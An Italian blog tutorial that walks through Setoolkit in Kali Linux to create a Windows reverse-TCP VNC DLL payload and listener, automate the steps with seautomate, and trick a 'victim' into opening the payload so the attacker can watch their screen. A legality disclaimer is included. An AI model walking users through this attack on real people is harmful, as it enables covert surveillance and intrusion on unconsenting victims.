
Come fare penetration testing con Setoolkit
Cari lettori di Tecnogalaxy, oggi vi parlerò del tool Setoolkit presente in Kali Linux, un tool molto potente per fare Social Engineering e non solo, nel test di oggi creeremo una procedura per automatizzare il penetration testing, senza rifare tutti gli step.
Quando si effettua un penetration testing, è comodo poter creare una procedura da rilanciare più volte senza doverla riscrivere. (Ovviamente cambiando i parametri in base alla macchina che si vuole testare).
Fare penetration testing con Setoolkit
Come sempre passiamo subito al divertimento utilizzando il nostro caro amico Kali Linux, apriamo una sheel e scriviamo il seguente comando:
Setoolkit
Eseguito il tool ci troveremo davanti il menù iniziale, come possiamo vedere abbiamo a disposizioni diverse opzioni, per il nostro test utilizzeremo l’opzione 1 (Social-Engineering Attacks).
Selezioniamo l’opzione 4 (Create a Payload and Listener).
Selezioniamo l’opzione 3 (Windows Reverse_TCP VNC DLL).
Inseriamo il nostro indirizzo IP:
192.168.1.4
La porta da mettere in ascolto:
5656
Confermiamo con yes.
Per automatizzare setoolkit, apriamo un file di testo e scriviamo la sequenza utilizzata, lo salviamo sulla scrivania (nel mio caso) con il nome luffman (possiamo mettere qualsiasi nome).
Adesso usciamo dal tool scrivendo exit.
Scriviamo nella shell il seguente comando e confermiamo con l’invio:
cd /usr/share/set/
Scriviamo ls per vedere il contenuto.
In qualsiasi momento con un solo comando potremo eseguire tutti gli step fatti in precedenza, scriviamo:
./seautomate /root/Scrivania(nel mio caso)/luffman (nome del file)
A questo punto il tool è in ascolto, dobbiamo inviare alla vittima il payload creato e indurlo ad aprirlo.
Quando il payload sarà eseguito, si aprirà su Kali Linux una finestra di VNC e potremo vedere tutto quello che avverrà sul pc della vittima.
Ovviamente tutto questo è illegale se non si ha il permesso, questo è un test dimostrativo.
N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.
Giorgio Perego
IT Manager
Leggi anche:
- Come Navigare Sicuri
- I vantaggi in termini di sicurezza derivanti dall’utilizzo delle VDR nelle transazioni immobiliari
- Cos’è il cashback: caratteristiche, utilità, settori
- Wire ha appena ricevuto un finanziamento di 30 milioni
- Woolsocks: Regali di Natale GRATIS
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI